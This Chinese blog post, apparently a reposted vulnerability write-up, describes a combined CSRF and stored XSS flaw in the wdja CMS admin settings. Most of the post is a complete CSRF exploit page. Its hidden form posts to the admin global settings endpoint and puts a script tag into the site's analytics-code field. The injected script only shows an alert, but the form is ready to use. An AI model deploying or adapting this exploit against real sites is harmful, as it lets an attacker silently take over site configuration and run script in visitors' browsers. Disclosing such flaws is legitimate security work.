• wdja漏洞 csrf+xss 组和漏洞


    首先存在csrf漏洞,在项目issues里面都提到过,通过配合可以实现这样的攻击思路:

    全站配置-》统计代码-》存在xss攻击

    构建的 CSRF EXP:

    <html>
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://wdja/admin/global/manage.php?action=basic&backurl=/admin/global/manage.php?type=basic" method="POST">
          <input type="hidden" name="logo" value="" />
          <input type="hidden" name="download_name" value="" />
          <input type="hidden" name="download_url" value="" />
          <input type="hidden" name="demo_url" value="" />
          <input type="hidden" name="modules" value="download" />
          <input type="hidden" name="modules_img" value="download" />
          <input type="hidden" name="icp" value="" />
          <input type="hidden" name="tongji" value="<script>alert('csrf+xss漏洞')</script>"/>
          <input type="hidden" name="title" value="" />
          <input type="hidden" name="topic" value="" />
          <input type="hidden" name="keywords" value="" />
          <input type="hidden" name="description" value="" />
          <input type="hidden" name="baidupush_url" value="" />
          <input type="hidden" name="baidupush_token" value="" />
          <input type="hidden" name="baidupush" value="" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>


    攻击截图:

  • 相关阅读:
    POI做报表
    (一) DB2的备份和恢复:准备
    西天取经为节约成本该裁掉哪位?
    python中configpraser模块
    python中subprocess模块
    python中os模块
    python中random模块
    python中time模块和datetime模块
    python中序列化json模块和pickle模块
    迭代器生成器函数的递归调用与二分法
  • 原文地址:https://www.cnblogs.com/wayne-tao/p/13110663.html
Copyright © 2020-2023  润新知